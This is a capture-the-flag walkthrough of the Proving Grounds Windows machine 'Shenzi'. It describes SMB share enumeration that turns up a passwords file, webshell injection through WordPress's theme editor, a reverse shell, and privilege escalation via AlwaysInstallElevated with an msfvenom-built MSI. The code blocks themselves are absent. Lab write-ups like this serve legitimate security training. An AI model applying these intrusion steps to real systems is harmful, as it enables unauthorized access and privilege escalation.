Shenzi
Last updated
Last updated
Source: Proving Grounds OS: Windows Community Rating: Hard
Started with the usual autorecon and was literally bombarded with open ports: FTP (21), HTTP (80), RPC (135), SMB (139), HTTP (443), SMB (445), MySQL (3306), 5040, 7680, 49664 -> 49669
FTP was configured to not allow anonymous access, so nothing could be done there for now.
I then started with HTTP (80). It displayed XAMPP’s default page.
When I tried to access phpMyAdmin, I received the message:
"New XAMPP security concept: Access to the requested directory is only available from the local network."
I searched online for a quick bypass in case there was an easy workaround, but nothing was found, so I moved on. HTTP (443) was just a replica of HTTP (80), and the fuzzers didn’t expose anything of value either.
I started checking SMB. I just checked the files from autorecon, enum4linux showed nothing, but then smbclient revealed a share named Shenzi.
I connected to the share using: smbclient \192.168.213.55\Shenzi
Inside, I found a passwords.txt file:
Most passwords were defaults, except for WordPress, which wasn’t the default. That should have hinted at something.
However, I couldn’t find any WordPress site. Even the fuzzers didn't expose any. I tried the credentials on FTP with no luck, and kept going in circles. I started looking for hints and that's where the name of the box/user came in handy, the WordPress site is deployed behind the username, http://192.168.213.55/shenzi/
That's what I hate about CTFs in general, the type of guessing enumeration.
Since I already had the admin credentials for WordPress, I didn’t run wpscan. I logged in and checked if I could inject a shell into the PHP files. I went to Appearance > Theme Editor, chose a PHP file (I tested with 404.php), and injected a basic webshell:
When that worked, I uploaded Ivan Sincek’s shell, which provided a reverse shell.
Once inside, I ran the basic whoami /priv
and then uploaded WinPeas. WinPeas exposed that:
This means any MSI package we install will run with elevated privileges. I then created an MSI shell using msfvenom:
I then uploaded and executed it:
Always check for shares; in this case, the Shenzi share contained a passwords file that was key to moving forward.
Sometimes, manual guess-work (like identifying the WordPress site via the username) is necessary when automated tools or fuzzers yield nothing. (I hate it)
Injecting a shell via the theme editor in WordPress is an easy way to gain initial access.
The AlwaysInstallElevated setting in both HKLM and HKCU is a reliable privilege escalation vector on Windows.